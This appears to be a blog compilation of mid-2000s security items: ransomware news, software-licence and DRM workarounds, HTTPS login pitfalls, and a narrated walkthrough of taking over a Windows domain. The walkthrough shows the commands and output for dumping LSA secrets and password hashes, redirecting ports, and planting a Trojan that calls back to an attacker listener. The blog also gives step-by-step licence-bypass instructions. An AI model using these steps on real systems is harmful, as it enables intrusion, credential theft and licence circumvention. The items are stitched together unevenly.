Ransomware: software that encrypts your data, and then charges you for the decryption key. More and more of these trojan are creaping onto the internet recently.

PandaLabs points out that this is not the first time such a Trojan has made the rounds, citing PGPCoder as having a "long record on the ransomware scene." Ransom.A is another Trojan that presented to the user both a shorter time frame and a significantly lower bounty -- a file was to be deleted every 30 minutes unless the user paid up the ransom of $10.99. Finally, Arhiveus.A also encrypted user files, but instead of demanding money, instead demanded that the user purchase products from an online drug store.

There appears to be no information available regarding what happens when the user attempts to contact the address in the e-mail or whether the alleged decrypting software actually does the job it's supposed to do. Gostev places a strong warning on his blog, however, saying that if you find yourself infected with Sinowal.FY, Gpcode.ai, or any other type of ransomware, do not pay up "under any circumstances." It also doesn't appear as if there is currently any antivirus solution that can help decrypt the files once they are encrypted, although Gostev says that the Kaspersky Lab team is currently working on a decryption routine.

Hackers have found a way around Microsoft Vista's activation system. Unlike Windows XP and Volume Activation 1.0 Wndows Vista doesn't have any corporate keys which will permanently activate it.

Volume Activation 2.0 requires a corporate user to either do a onetime activation through Microsoft servers (MAK) or companies can host a local activation server which does not talk to Microsoft (KMS). The only difference is KMS requires re-activation once every 180 days. However as long as there’s a local KMS server it’s simple to keep Windows Vista activated.

The hacker's release is a VMware image of a permanently activated KMS (Key Management Service) server which allows local activation of Windows Vista Business/Enterprise Edition. As such, it's not true that the workaround will be usable for only six months. Press reports stating so are written by people who don't know what they're talking about. The "client" Vista activates every six months, not the server, which in this case is permanently activated.

Volume Activation 2.0 is only built into those two editions. Companies which buy 25 numbers or more of the OS would be given the KMS to simplify the activation process. For it to work, users have to type in the non-virtual Vista two commands which launch the same Visual Basic script with different options:

cscript c:\windows\system32\slmgr.vbs -skms vm_vista_ip
cscript c:\windows\system32\slmgr.vbs -ato

The hack was released under the name of Bill Gates' wife, Melinda Gates. The actual name of the pirate scene release is "Microsoft.Windows.Vista.Local.Activation.Server-MelindaGates." Cracked copies of Windows Vista started flooding the internet soon after the operating system was released to manufacturing and ahead of its official release. However, the lack of a corporate activation key made most of them useless. Some activation cracks were apparently released, using some beta files from RC versions of Vista, but apparently they didn't work for everyone.

This only shows that while Microsoft tries to block illegal users from using its operating systems, they will not be able to prevail for long. For every security system there's always a workaround if you have physical access to the machine, that's a rule every security expert knows. Everything can be cracked eventually, if it's worth it.

Sometimes it's hard to draw the line between "fair use" and "just plain ol' dumb," but if being in charge of the playback and storage of your purchased media is of the utmost importance to you -- to the tune of a couple grand -- then Jake Ludington over at MediBlab has a solution for you. His argument in favor such extreme measures is the tried and true "backup" excuse, since, so far, managed copy hasn't made its way into his discs or hardware. Of course, with the amount of money involved in his method, he would probably be better off just paying buying a few extra copies of any disc he might purchase, and storing 'em in a vault someplace. However, if you would like to follow in Jake's fair usin' footsteps, the method is really quite straightforward. Just score yourself an Xbox 360 and HD DVD drive (one of the view HD DVD solutions which will output 1080i or 720p via component), a minimum of 4 eSATA drives in a RAID 0 array (for which you might need an external SATA card), an AJA XENA LG analog HD capture card (which will be doing most of the heavy lifting in this process), and a speedy PC for processing the video once you've got it all captured. Not quite 1080p, and not quite digital perfection, but it should win you a good bit of love and recognition in the BitTorrent community be plenty good for most "backup" purposes.

The anti-spam group Blue Security whos tool Blue Frog I use has been under severe attack from the largest spammer (PharmaMaster) in the world. This tells me 1 thing - its working. These spammers wouldnt waste the time, effort or bandwidth if Blue Frog wasnt hurting their businesses. After receivng serevals threats myself I thought about stopping Blue Frog. But then they would have won. So I shall continue and would recommend the tool to even more people - this stuff works!

Aside from blackmail emails sent to community members, there were two separate attacks on Blue Security itself. The first attack was to block worldwide access to Blue Security's corporate website by tampering with the Internet backbone using a technique called "Blackhole Filtering". The Second attack was a DDoS attack on Blue Security's operational system.

More details on attack here

If you cant be bothered to convert your Divx to WMV, let this hack do it for you on the fly.

Microsoft 's experimental Honeymonkey project has found almost 750 Web pages that attempt to load malicious code onto visitors' computers and detected an attack using a vulnerability that had not been publicly disclosed, the software giant said in a paper released this month.

Known more formerly as the Strider Honeymonkey Exploit Detection System, the project uses automated Windows XP clients to surf questionable parts of the Web looking for sites that compromise the systems without any user interaction. In the latest experiments, Microsoft has identified 752 specific addresses owned by 287 Web sites that contain programs able to install themselves on a completely unpatched Windows XP system.

Honeymonkeys, a name coined by Microsoft, modify the concept of honeypots--computers that are placed online and monitored to detect attacks.

"The honeymonkey client goes (to malicious Web sites) and gets exploited rather than waiting to get attacked," said Yi-Min Wang, manager of Microsoft's Cybersecurity and Systems Management Research Group. "This technique is useful for basically any company that wants to find out whether their software is being exploited this way by Web sites on the Internet."

Some people might say that it serves them right. But Cisco are in for a week of hell.

Exploit writers team up to target Cisco routers

Michael Lynn –  "If you put him and a (Cisco) box in a room, the box breaks"

After Cisco strong-armed Mike Lynn's employer into forcing him to abandon his planned presentation on vulnerabilities in Cisco routers at the Black Hat conferences, they sent employees down to literally rip Lynn's presentation out of the program books. Here's video of the presentation disappearing down the memory hole. Video Link at Make Blog

Original article

Now playing: - solidstore radio

Mike Lynn gave an interesting interview to Wired. Here's some news about the FBI's investigation.

Someone is setting up a legal defense fund for Lynn. Send donations via PayPal to Abaddon@IO.com. According to BoingBoing, donations not used to defend Lynn will be donated to the EFF.

Copies of Lynn's talk have popped up on the Internet, but some have been removed due to legal cease-and-desist letters from ISS attorneys, like this one. Currently, Lynn's slides are here, here, here, here, here, here, here, here, here, here, here, here, here, here. (The list is from BoingBoing.) Note that the presentation above is not the same as the one Lynn gave at BlackHat. The presentation at BlackHat didn't have the ISS logo at the bottom, as the one on the Internet does. Also, the critical code components were blacked out. (Photographs of Lynn's actual presentation slides were available here, but have been removed due to legal threats from ISS.)

There have been a bunch of commentary and analyses on the whole story. Business Week completely missed the point. Larry Seltzer at eWeek is more balanced.

Hackers are working overtime to reconstruct Lynn's attack and write an exploit. This, of course, means that we're in much more danger of there being a worm that makes use of this vulnerability.

The sad thing is that we could have avoided this. If Cisco and ISS had simply let Lynn present his work, it would have been just another obscure presentation amongst the sea of obscure presentations that is BlackHat. By attempting to muzzle Lynn, the two companies ensured that 1) the vulnerability was the biggest story of the conference, and 2) some group of hackers would turn the vulnerability into exploit code just to get back at them.

The following information is provided for informational purposes only. Neither my employer or I provide this information as a means to exceed you licence limit for InstallshieldX. Dont be a moron.

How to Disable InstallshieldX licence checks when opening VS.NET solutions

On to business:

1. Fire up regedit
2. navigate to HKLM\Software\Installshield\10.0\Professional
3. Change string key 'VSDotNet11SCKey' to point to a non-existant file. E.g. change existing value by adding a '2' to the end of the filename. Here's my settings: C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\IDE\devenv.exe /command "View.ShowWebBrowser file://C:\PROGRA~1\INSTAL~2\Program\0409\GETSTA~1.HTM2"
4. restart VS.NET

job done.

Much has been written about the insecurity of passwords. Aside from being guessable, people are regularly tricked into providing their passwords to rogue servers because they can't distinguish spoofed windows and webpages from legitimate ones.

Here's a clever scheme by Rachna Dhamija and Doug Tygar at the University of California Berkeley that tries to deal with the problem. It's called "Dynamic Security Skins," and it's a pair of protocols that augment passwords.

First, the authors propose creating a trusted window in the browser dedicated to username and password entry. The user chooses a photographic image (or is assigned a random image), which is overlaid across the window and text entry boxes. If the window displays the user's personal image, it is safe for the user to enter his password.

Second, to prove its identity, the server generates a unique abstract image for each user and each transaction. This image is used to create a "skin" that automatically customizes the browser window or the user interface elements in the content of a webpage. The user's browser can independently reach the same image that it expects to receive from the server. To verify the server, the user only has to visually verify that the images match.

The latest attack allows an attacker equipped with specialized hardware to reset the pairing process and then record the resulting exchange of data. The brute force cracking algorithm can quickly use that data to find the PIN that secures either device. A password made up of 4 digits takes 0.06 seconds to break. Even a PIN made of 7 decimal digits only takes 76 seconds to break.

How about this! A WiFi hackerbot that seeks out people whose laptops are leaking cleartext passwords and rolls up to their feet, displaying their passwords on a upfacing LCD

In my personal top ten of the world's most disgusting companies this week's highest entry is Vodafone who almost managed to supersede NTL:Home in their lead position. The reasons: greed and bad taste. What happened?

Every now and then I have the option to renew my mobile phone, and this time I went for the Sony Ericsson V800 -  already knowing that the "v" stands for "Vandalized by Vodafone". It's unbelievable - on the case alone they managed to place their logo four times - and it's not a simple screen print that you could rub off with a little nitro - no, removing them would mean to ruin the case permanently.

But what's worse is that they also run the phone on their own OS which means that also on the screens there is big-red Vodafone all over the place. You can replace most of those graphics with your own, but you cannot delete them from the phone's memory. They hijack one of the two main menu entries so you will always connect to their internet portal when you - maybe accidentally - click it. But well, it looks like that is the price that you have to pay for getting a discount on the phone.

Unfortunately that is not the end of the story. In their endless greed Vodafone has disabled one of the most common used functions - the ability to use mp3 files as ringtones. You can upload them into your phone, yes. You can also listen to them on the media player. But you are not allowed to use them as ringtone, alarm or as a contact identifier. Why not? Because Vodafone wants you to buy the ringtones from their portal. Buy ringtones? Do I look like a teenager or a brain-amputee? No way. But I'm not the first one to have that problem - Google reveals that probably every owner of this phone looks for a solution to this and until recently there has been a way to circumvent this:

 In order for mp3s to be freely usable on the v800 they have to be packaged as DRM files. A DRM file is a wrapper that can be used to restrict or allow certain usage of its contents. Fortunately Sony Ericsson provides - or rather provided - developers with a DRM Packager Tool. This tool allows - no - allowed you to convert .mp3 files to .dm files. Of course something as useful as this was soon discovered and the link made its round through mobile forums all over the web with the result, that suddenly the tool officially is not available anymore on the Sony Ericsson site. In order to get it these days it seems like you have to visit dark backrooms of dubious sites or try to find someone who was lucky enough to download it whilst it was still available (like me).

 Fortunately I discovered another way to make my mp3 files work as ringtones and as I haven't found this solution on any SE v800 related forum yet, here is how it works: Unlike Sony Ericsson Nokia has not yet surrendered to the Dark Side. And as developers for Nokia phones have to create DRM packages, too, this company also offers a tool to accomplish this task. The tool we need is part of the Nokia Mobile Internet Toolkit 4.1 - in order to download it you will have to register as a developer at the Nokia Forum, but that registration is free and currently open to everyone. After downloading it you will have to register the application to receive a serial number - so make sure that you enter a valid email adress. 

The actual method to convert .mp3s to .dm files works like this:

• launch the NMIT 4.1 application
  
• Click on the "Digital Rights" link.
  
• This will bring you to the DRM packager.
  
• Click the radio button "Combined Delivery Lock (.dm) [1] - on the right side the "Specify Rights" screen will appear.
  
• In this screen select the "Enable Play Rights" checkbox [2] in the "Play" tab. For our purposes it is not necessary to set any of the other options.
  
• Click the "Load Content" button and select an mp3 from your collection.
  
• Select File - Save from the top menu or press CTRL-S to save the DRM package as a .dm file.
  
• Upload the .dm file into the "Sounds" folder of your v800 memory stick via the method of your choice (Bluetooth, USB, Infrared) . After uploading via USB make sure to unplug the cable in order to avoid file locking.
  
• On your v800 go to to the "My Phone" menu, select "Sounds", search the title of the sound file you uploaded and select "More -> use as -> ringtone".
  
• Done.

 

One of my favourite blogs has just released an updated list of must have developer tools. Best start downloading!

Of course you've been able to do this in Firefox for eons. But here we go:

 WinInet Limits Connections Per Server

http://support.microsoft.com/kb/183110

 

Critical Mistake #1: Non-HTTPS Login pages (even if submitting to a HTTPS page).

Most webdevs know that HTTPS is comparatively expensive-- the multistage handshake with multiple roundtrips and cryptographic operations is inherently less performant than straight HTTP.  A few years ago, someone got the bright idea that login pages should be served via HTTP to reduce this performance hit. 

The thinking goes something like: "Well, since the HTTP POST containing the user's credentials is sent via HTTPS, any man-in-the-middle can't see the data." 

And this seemed like a reasonable idea.  The practice became even more popular as banks and credit card companies decided that customers should be able to log in directly from the HTTP-delivered homepage.  Three of my financial institutions offer this "convenience".  One of them even draws little lock icons near the login box and provides a phone number for customers to call so they can convince them that it's safe.

There are two problems with this practice: One fairly obvious, and one slightly less obvious.  The first problem is simple: How does the user know that the form is being submitted via HTTPS?  Most browsers have no such UI cue.  (Pretty much everyone turns off the "Warn when sending unencrypted form data" option within 2 minutes of installing the browser.)  Even supposing there was a UI cue that the form was targeted at a HTTPS page, how could the user know that it was going to the right HTTPS page?  If the login form was delivered via HTTP, there's no guarantee it hasn't been changed between the server and the client.  A bad guy sitting on the wire between the two could simply retarget the POST to submit to a HTTPS site that he controls.  Oops. 

Think that's bad?  There's an even more sneaky attack the bad guy could execute.  The event model in HTML is pretty rich, and one of the things it can do is listen for keystroke events.  So, the bad guy could simply rewrite the login page HTML to leak keystrokes to a server he controls, every time a key is pressed.  Unsecured login form + Man-in-the-Middle+ 5 lines of JScript + Serverside keystroke collector = Bad News.  

(Food for thought: The keystroke-sniffing attack gets even worse if your JS can run in the browser chrome, a feature offered by some browsers.)

Critical Mistake #2: Mixing HTTP Content into a HTTPS page

Some HTTPS pages pull in assorted resources over HTTP, which leads to the annoying "This page contains both secure and nonsecure items" prompt.  Why does this hassle exist?  Is it really so bad if some files get pulled down via HTTP, if the main body of my page is delivered via HTTPS?

The answer is, of course, yes, this is a bad thing.  For one thing, it's impossible for the user to tell what parts of the page were delivered securely, and what parts were not.  And worse, if a man-in-the-middle can rewrite the HTTP traffic, he can, for instance, rewrite the HTTPS page using standard DHTML.  Or, he can scan the page for any information of interest (e.g. a credit card number) and POST that data to a server he controls.  Using HTTP-delivered resources on a HTTPS-delivered page pokes holes in your secure channel.  Don't do it.

 

Top football defenders not only tackle hard, but distribute the ball intelligently to teammates. A similar challenge faces software developers today to ensure system uptime and data integrity, while ensuring that systems are nimble enough to operate at Internet speed.

In my opinion, many of the security problems that plague the internet (and computers in general) are caused by the fact that companies still put their priorities in the wrong place. Most programmers still choose performance over stability and security.

From Zdnet: http://news.zdnet.co.uk/0,39020330,39187253,00.htm

Microsoft's AntiSpyware product is threatened by a Trojan horse that also tries to steal online banking details.

Antivirus experts, who are calling the Trojan Bankash-A, say it is the first piece of malware to attack Microsoft's anti-spyware product, which is still in beta.

"This appears to be the first attempt yet by any piece of malware to disable Microsoft AntiSpyware," said Graham Cluley, senior technology consultant for Sophos. "As Microsoft's product creeps out of beta and is adopted more by the home user market, we can expect to see more attempts by Trojan horses, viruses and worms to undermine its effectiveness."

The Trojan is said to suppress warning messages displayed by Microsoft AntiSpyware, and delete all of the files in the program's folder.

Like many other Trojans, Bankash will also steal passwords and online banking details from Windows users. The program targets users of UK online banks such as Barclays, Cahoot, Halifax, HSBC, Lloyds TSB, Nationwide, NatWest, and Smile.

Sophos called the Trojan Bankash because it attacks banking customers and installs a file called ASH.DLL onto a victim's hard drive.

Microsoft's UK press office was awaiting comment from the US headquarters at the time of writing.

 

Owning the Domain

So far I own the database server and the Web server (everything except the domain controller in fact). But what have I really gained with the Web server? To find out, I need to start by uploading my tools to it and getting a remote command shell on that system just like I did on the database server. It is just a bit simpler now that I have an administrative SMB connection to the Web server. SMB allows easy access to the Web server. For example, I can now schedule a command or launch some form of portable remote command shell.

Once I have a local shell, I can use all the normal tools that I know and love. For example, I can easily find out who all the local administrators are. There are not many accounts here:

C:\warez>net localgroup administrators
Alias name administrators
Comment Administrators have complete and 
unrestricted access to the computer/domain
Members
----------------------------------------------
Administrator
PYN_DMZ\_ids
PYN-DMZ\Domain Admins
The command completed successfully.

I only see the service account I've already found, the local administrator, and the domain admins. That probably means that when they need to administer the system, they use a domain administrator account. This means it might be possible to use a Trojan horse program to make one of those users take over the domain for us. Generally speaking, an attacker would rather use a direct attack, since they produce faster results. If all else fails, however, I will resort to a passive attack to accomplish my goal. You may have noticed by now that I have not seen so much as a dialog box. Can't I do some GUI hacking for a change? Sure. There are some tricks to it, though.

Recall that there were only two ports open on the firewall, 80 and 443. Since nothing was listening on port 443 on the Web server, I can establish a listener on that port without disrupting operations and risk tipping off the legitimate administrators. Rebinding terminal services to use that port would be highly noticeable.

Windows Terminal Services (using Remote Desktop Protocol) listens on port 3389. A portscan of the database server reveals that 3389 is indeed open:

C:\warez>portscan 172.17.0.3
Port 172.17.0.3:135 open
Port 172.17.0.3:139 open
Port 172.17.0.3:445 open
Port 172.17.0.3:1433 open
Port 172.17.0.3:3389 open

I can't establish a direct connection to the database server; for one thing, it's on a NAT'd network and is not directly accessible from the Internet. I can get there by putting a port redirector on the Web server. A port redirector takes traffic coming in on one port and directs it to another host on another port. In other words, I'll set up a port redirector on the Web server which will take incoming traffic on port 443 and send it to the SQL server on port 3389:

C:\warez>socketpipe 443 88 3389 172.17.0.3

With that socket open, all I do is establish a Web server connection using Terminal Services Client:

mstsc /v:192.168.2.30:443

Now that I can log on with my _ids user account, I have the full power of a graphical user interface (which some would argue is somewhat less than the full power of a command line, but no matter).

Even with the GUI, I have not yet taken over the DC. I'm going to use a Trojan horse to take it over. To do so, I use a really evil custom tool. First, I'll register it on the Web server (172.17.0.1) over my terminal services connection:

c:\warez>EvilTrojan -r 172.17.0.1 -a 192.168.2.112

The tool registers itself in the HKLM\Software\Microsoft\Windows\CurrentVersion\Run key, and therefore runs every time a user logs on. If that user is a domain admin, it creates a new user account on the domain and then adds that account to the domain admins group. If it's able to do so, it opens up the Messenger service and sends an administrative alert to the attacker (192.168.2.112 in our case). Lastly, it removes itself from the Run key to hide its tracks. All this happens while the administrator is logging on, and therefore is completely transparent to the administrator. In the end, the only thing left on the system to indicate that anything happened is a file called avcheck.exe that is located in the Windows directory.

Obviously, some other backchannel notification can be used. In the real world, attackers often use Internet Relay Chat (IRC). Even a really subtle HTTP transaction can serve as notification. Now all I have to do is to wait for a domain administrator to log on. Once an administrator logs on, I get a handy success notification:

C:\>nc -l -p 80
Succeeded in adding a user.
User: attacker$
Password: "Uare0wn3d!"
Domain: PYN-DMZ
DC: PYN-DMZ-DC

The notification can be received any way I want. This particular Trojan simply opens a socket to port 80 on the attacker's host and sends the notification to it. Notifications could be encrypted, encoded, come over just about any port or protocol, and altered in a myriad of ways. For instance, notifications to an IRC chat channel are quite common.

At this point, the DMZ domain has fallen and I have taken over the domain controller. Remember, this is the keeper of the keys to the kingdom and contains the user accounts database, among other things. In order to make use of this newfound power, I once again make the DC connect to me so I can get a remote shell. Once I do, I continue learning more about where I am:

C:\warez>ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : PYN-DMZ-DC
   Primary Dns Suffix  . . . . . . . : PYN-DMZ.LOCAL
   Node Type . . . . . . . . . . . . : Unknown
   IP Routing Enabled. . . . . . . . : Yes
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : PYN-DMZ.LOCAL

Ethernet adapter CorpNet:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel 21140-Based PCI Fast Ethernet Adapter (Generic) #2
   Physical Address. . . . . . . . . : 00-03-FF-06-3E-F0
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : 10.1.2.16
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
   DNS Servers . . . . . . . . . . . : 172.17.0.2

Ethernet adapter DMZNet:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel 21140-Based PCI Fast Ethernet Adapter (Generic)
   Physical Address. . . . . . . . . : 00-03-FF-07-3E-F0
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : 172.17.0.2
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.17.0.1
   DNS Servers . . . . . . . . . . . : 172.17.0.2

This system is not only dual-homed, but it is dual-homed on the corporate network and the DMZ, which means it must be acting as the router between the two. Before I take advantage of that fact, I can dump out all the user accounts on the domain controller. Recall that earlier I learned that there were about 15 user accounts on the DC? Well, cycles are wasting, so I'd better dump out the password hashes and get to work cracking them. Since I have administrative privileges, doing so is a simple matter of running the very popular PWDump tool.

C:\warez>pwdump2.exe
Administrator:500:624aac413795cdc1ff17365faf1ffe89:b9e0cfceaf6d077970306a2fd88a7c0a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:28237c666e4bb3cc96d670cadca1593b:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:cd072175763b0d5b3fbb152f57b96e7c:::
FAjenstat:1106:daf058ae79085db217306d272a9441bb:c43325fdf77cafacf02f6e3eaa7f5020:::
AAlberts:1107:1df8f06dcf78bb3aaad3b435b51404ee:2408f92ab284046ddcc6952755f449e2:::
HAcevedo:1108:dbff4b96d021df2f93e28745b8bf4ba6:bbd9477810308a0b676f3cda91f10539:::
MAlexander:1109:d278e69987353c4c837daf3f2ddd5ca3:2c67b571425751747e7ae379fefe9fcc:::
KAkers:1110:693de7f320aae76293e28745b8bf4ba6:fb853a32ccd2b92b43639b0e7d29e09d:::
TAdams:1111:ea03148efb24d7fc5be30f58d2a941d5:18cce97ee181d42be654133658723813:::
KAbercrombie:1112:6c32f38de08f49f026f8092a33daaf05:a88b78471261477e26d9e4c11571b127:::
Sculp:1113:49901659efc5e1d6aad3b435b51404ee:d986300c7c0c33d3cc5417dbac6f90db:::
SAbbas:1114:d6855d70abc371c2b77b4e7109416ab8:363c93e6be7a5cb001e7ad542c292f26:::
•••

By default, Windows stores two different password representations: the LM "hash" (which is not a hash at all) and the Windows NT hash. From this output, I can tell that this system stores the LM hashes. This is good news for a criminal hacker since LM hashes are so much easier to crack. Feeding this output into my favorite password cracker, I can crack most of the passwords on this system within 24 hours. In fact, in less than a minute, I've cracked three of them using a hybrid attack. A real attacker may crack passwords even faster. Tools are available that trade off storage space for cracking speed, greatly decreasing crack time.

Now that I have the passwords, I need to find out more about where to use them. First, I know which systems are available on the 172.17.0/24 network, so let's see what I can find on the 10.1.2/24 net:

C:\warez>discoverHosts 10.1.2
Reply from 10.1.2.16: bytes=32 time<1ms TTL=128
Reply from 10.1.2.17: bytes=32 time=54ms TTL=128

16 is the datacenter DC as we've already learned, but 17 is a new host that we have not seen before. Let's see if I can get some more information on it:

C:\warez>GetSystemInfo 10.1.2.17
Server info on 10.1.2.17
Name:   PYN-CORPDC
Domain: PYN
Version:        5.2
Platform ID:    500
Comment:
Server Flags:
Workstation
Server
Domain Controller
Time source

 

17 is the domain controller I was looking for originally. I can tell that it is running Windows Server 2003, but not much else about it. Perhaps dumping out the users will give me additional information:

C:\warez>dumpinfo 10.1.2.17

The Administrator is:   PYN\Administrator

Users on PYN-CORPDC:
RID 1000   PYN\HelpServicesGroup   an Alias
RID 1001   PYN\SUPPORT_388945a0    a User
RID 1002   PYN\TelnetClients       an Alias
RID 1003   PYN\PYN-CORPDC$         a User
RID 1104   PYN\FAjenstat           a User
RID 1105   PYN\AAlberts            a User
RID 1106   PYN\HAcevedo            a User
RID 1107   PYN\MAlexander          a User
RID 1108   PYN\KAkers              a User
RID 1109   PYN\TAdams              a User
RID 1110   PYN\KAbercrombie        a User
RID 1111   PYN\Sculp               a User
RID 1112   PYN\SAbbas              a User
RID 1113   PYN\MAllen              a User
RID 1114   PYN\JAdams              a User
RID 1115   PYN\SAlexander          a User
RID 1116   PYN\HAbolrous           a User
RID 1117   PYN\PAckerman           a User
RID 1118   PYN\GAlderson           a User
•••

Share      Type            Comment
IPC$       Unknown         Remote IPC
NETLOGON   Disk            Logon server share
ADMIN$     Special         Remote Admin
SYSVOL     Disk            Logon server share
C$         Special         Default share

Administrators:
Unable to enumerate administrators
ERROR: Access Denied

As you can see, this system has a lot of users. Listed are several old friends who also had accounts on the DMZ DC. In fact, there are several whose passwords I have already cracked on the DMZ. At this juncture, I could either try to gather more information, or I could just be bold and try those accounts. Three guesses which of those options a hacker would use:

C:\warez>net use \\pyn-corpdc\c$ /u:pyn\GAlderson "yosemiTe^"
The command completed successfully.

This network has now been thoroughly hacked. I could go on and do whatever I came for, but from here on, it is mostly up to what the attacker wants to do. Potential options would be to scavenge the network for data, steal confidential information, use the network to attack some other network, and so on. The attacker has complete and unrestricted access to the entire solidstore.co.uk network.

Now read How to Get a Hacker Out of Your Network

 

I have now pierced the eggshell. At this point, the objective is to fully "own" the network and take over everything else. Before I really get going, let's get some more information on my target using the dumpinfo utility. dumpinfo is a custom tool that enumerates information from a system over a null session. A null session is an anonymous connection—one made without any authentication.

C:\warez>dumpinfo 127.0.0.1

The Administrator is:   PYN-SQL\Administrator

Users on PYN-SQL:
RID 1000        PYN-SQL\TsInternetUser  a User
RID 1001        PYN-SQL\SQLDebugger     a User

Share           Type            Comment
IPC$            Unknown         Remote IPC
ADMIN$          Special         Remote Admin
C$              Special         Default share

Administrators:
PYN-SQL\Administrator
PYN-DMZ\_ids
PYN-DMZ\Domain Admins

From this I can learn that there is not much on this system; it looks rather like a default system. Before I proceed with using this information, let's figure out the lay of the land.

C:\warez>ipconfig /all

Windows 2000 IP Configuration

        Host Name . . . . . . . . . . . . : PYN-SQL
        Primary DNS Suffix  . . . . . . . : PYN-DMZ.LOCAL
        Node Type . . . . . . . . . . . . : Mixed
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No
        DNS Suffix Search List. . . . . . : PYN-DMZ.LOCAL

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        Description . . . . . . . . . . . : Intel 21140 Based PCI Fast Ethernet Adapter
        Physical Address. . . . . . . . . : 00-03-FF-03-3E-F0
        DHCP Enabled. . . . . . . . . . . : No
        IP Address. . . . . . . . . . . . : 172.17.0.3
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 172.17.0.1
        DNS Servers . . . . . . . . . . . : 172.17.0.2

Invoking ipconfig.exe tells me my IP address and configuration. Notice that the machine has a private address so my connection must be going through a NAT router at 172.17.0.1. This information will also be useful later. Now, let's get hacking again.

The first thing the attacker does now is look for the easy exploits. Perhaps the simplest is to use shared service accounts, if present. Shared service accounts are an easy vector because the easiest way to configure services on multiple systems is to use domain accounts to run those services under, and then configure services on many systems to run with the same accounts. Alternatively, in some environments, local accounts are used, but the credentials match those on other systems. This means that if we find any services running in regular user accounts (as opposed to system accounts such as LocalSystem, NetworkService, and LocalService) it's likely that they are used on multiple systems.

To find out whether this is a viable vector, let's check who is running services on the database server I am on. To do that, I use a tool designed for that purpose:

C:\warez>serviceuser \\PYN-SQL
IDS
PYN_DMZ\_ids

As you can see, there is a domain account used for the IDS service (presumably the Intrusion Detection Service). To find out whether it is truly useful, let's learn more about the account using the net command.

C:\warez>net localgroup administrators
Alias name  administrators
Comment     Administrators have complete and 
            unrestricted access to the 
            computer/domain.

Members
----------------------------------------------
Administrator
PYN-DMZ\Domain Admins
PYN-SQL\Administrator
PYN-DMZ\_ids
The command completed successfully.
The _ids account is a domain account; and it is a local administrator.

It would of course be preferable if this was a domain account, but I'll take what I can get. To understand what you can do with this account, you need to know a little more about how Windows operates. Services are applications that run when the system boots. Just like any other process on the system, services must run under some kind of user identity. When the service starts, the operating system will authenticate the account used for the service. To do this, it needs a username and password, which is stored in the Local Security Authority (LSA) Secrets. The LSA Secrets are maintained by the LSA to hold certain sensitive information, such as the computer account credentials, encryption keys, and service account credentials.

The LSA Secrets are encrypted on disk and decrypted by the OS when the machine boots. They are then held in clear text in the LSA process memory space while the system is running. To get at this information, the hacker must hook a debugger to the LSA process. That may sound daunting, but there are utilities designed specifically for this purpose. Note that the LSA is running as LocalSystem, so not just anyone can attach a debugger to a process running as LocalSystem. Doing so would be a serious security breach and violate all kinds of security models. However, any user who has the SeDebugPrivilege can do so. By default, this means only the Administrators are able. Since Administrators can do whatever they want anyway, this is not a security problem. They own the system without that privilege, and can grant themselves the privilege if they want. The problem comes when untrusted users have that privilege. In my case, I don't have to worry about that because my remote shell is running as LocalSystem. In other words, I am running as the same identity as the LSA process, and therefore have the right to attach a debugger to it, whether I have the privilege or not.

The output of running Lsadump has been truncated to make it easier to read, but the really interesting piece is right at the end, where the service account credentials are listed.

C:\warez>lsadump2
$MACHINE.ACC
 13 FE 4C 3A 04 F8 1F 94 75 C8 9B 0B 1C 35 45 7A  ..L:....u....5Ez
 52 7E 25 DF F8 17 F2 96 3A 35 81 C7              R~%.....:5..
DefaultPassword
DPAPI_SYSTEM
 01 00 00 00 C8 AA F8 8C 36 C7 69 CC DD 42 CB 15  ........6.i..B..
 3F 4E 07 6D 48 05 0A 4C FE 31 87 C9 F2 58 A3 AD  ?N.mH..L.1...X..
 B7 AD 13 20 26 11 24 24 FF 79 AE D3              ... &.$$.y..
...
_SC_IDS
 69 00 64 00 73 00 50 00 61 00 73 00 73 00 77 00  i.d.s.P.a.s.s.w.
 64 00 21 00                                      d.!.

As you can see, the right-hand column holds the service account password. I now know that there is a user called _ids, and that it has a password of "idsPasswd!" (the output is in Unicode, hence the dots in between, signifying nulls). The only thing left now is to find out where to use this account. By pinging all the hosts on the subnet, I find that there are only two other machines on this subnet, 172.17.0.1 (the gateway) and 172.17.0.2 (the DNS server). I suppose I should figure out a little bit more about each of them. To do that, I use dumpinfo again. By default, some Windows systems give out more information than others over a null session.

C:\warez>dumpinfo 172.17.0.1

Unable to look up the local administrator
Unable to enumerate users because I could not get the Admin Sid

Share           Type            Comment
IPC$            Unknown         Remote IPC
ADMIN$          Special         Remote Admin
wwwroot$        Disk
C$              Special         Default share

Administrators:
Unable to enumerate administrators
ERROR: Access Denied

I'm not getting very much info on this system because it is a Windows Server 2003 member server. Note that on Windows Server 2003 standalone and member servers, null session users will only be able to list the shares on the system, not the user accounts by default. You can tell from the dumpinfo output, however, that the default gateway is running a Web server, based on the fact that it exposes a wwwroot$ share. Notice that I do get a list of all the so-called hidden shares (shares postfixed with a $). The dollar sign is just a notification to the client-side of the API not to display this item. The dumpinfo tool ignores that notification and displays the item anyway.

It would also be helpful to find out what services are available on this system. This information will tell you the type of connections that you can make to it. To do that, let's turn to the portscanner:

C:\warez>portscan 172.17.0.1
Port 172.17.0.1:80 open
Port 172.17.0.1:135 open
Port 172.17.0.1:139 open
Port 172.17.0.1:445 open
Port 172.17.0.1:3389 open

This really doesn't tell me much, but it does verify that I am allowed to make SMB (ports 139 and 445) and Terminal Services connections (port 3389) to the gateway/Web server. This will be highly useful for furthering the attack in just a moment.

